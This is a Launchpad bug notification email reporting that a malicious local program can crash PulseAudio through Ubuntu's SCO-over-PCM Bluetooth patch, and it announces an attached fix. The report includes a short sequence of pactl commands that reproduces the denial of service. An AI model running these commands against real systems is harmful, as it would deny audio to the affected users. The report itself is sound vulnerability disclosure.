The attachment "0001-bluetooth-don-t-set-sink-volume-callback-in-SCO- over.patch" seems to be a patch. If it isn't, please remove the "patch" flag from the attachment, remove the "patch" tag, and if you are a member of the ~ubuntu-reviewers, unsubscribe the team.
[This is an automated message performed by a Launchpad user owned by ~brian-murray, for any issues please contact him.] ** Tags added: patch -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/2078822 Title: With Bluetooth headset connect, a malicious program can crash Pulseaudio on Ubuntu16.04 Status in pulseaudio package in Ubuntu: New Bug description: On Ubuntu 16.04, a malicious app could abuse a Bluetooth module configuration for Ubuntu Touch to crash Pulseaudio: ``` pactl unload-module module-bluez5-discover pactl load-module module-null-sink sink_name=sink.fake.sco rate=8000 channels=1 pactl load-module module-null-source source_name=source.fake.sco rate=8000 channels=1 pactl load-module module-bluez5-discover sco_sink=sink.fake.sco sco_source=source.fake.sco # Now, connect a Bluetooth headset, then: pactl list cards # Make note of Bluetooth card name. pactl set card-profile bluez_card.<address> headset_head_unit pactl set-sink-volume sink.fake.sco 69 ``` An app could repeatedly do this, preventing audio from working as long as a Bluetooth headset is still connected. This is discovered while working on a similar patch on UBports' Ubuntu Touch 20.04. Admittedly, I was not able to actually test this on Ubuntu 16.04 + ESM proper yet, but a similar set of commands is tested to be able to crash Pulseaudio on Ubuntu Touch 20.04, which carry a forward-ported version of the SCO-over-PCM patch. A patch which should fix this issue is attached. This is a problem in Ubuntu-specific SCO-over-PCM patch, and thus is not applicable in other distros. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/2078822/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
